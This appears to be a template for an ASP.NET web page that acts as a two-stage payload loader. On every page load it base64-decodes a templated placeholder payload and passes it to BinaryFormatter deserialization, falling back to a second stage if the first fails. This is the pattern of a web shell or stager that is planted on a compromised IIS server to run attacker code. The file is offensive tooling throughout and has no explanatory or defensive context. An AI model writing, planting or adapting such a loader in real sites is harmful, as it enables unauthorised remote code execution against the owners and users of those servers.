<%@ Page Language="C#" %>
<%@ Import Namespace="System" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Runtime.Serialization" %>
<%@ Import Namespace="System.Runtime.Serialization.Formatters.Binary" %>

<script runat="server">
    protected void Page_Load(object sender, EventArgs e)
    {
        try
        {
            byte[] assemblyBytes = Convert.FromBase64String("{{stage_1}}");
            BinaryFormatter bf = new BinaryFormatter();
            MemoryStream ms = new MemoryStream();
            ms.Write(assemblyBytes, 0, assemblyBytes.Length);
            ms.Position = 0;
            bf.Deserialize(ms);
        } catch (Exception ex)
        {
            byte[] assemblyBytes = Convert.FromBase64String("{{stage_2}}");
            BinaryFormatter bf = new BinaryFormatter();
            MemoryStream ms = new MemoryStream();
            ms.Write(assemblyBytes, 0, assemblyBytes.Length);
            ms.Position = 0;
            bf.Deserialize(ms);
        }
    }
</script>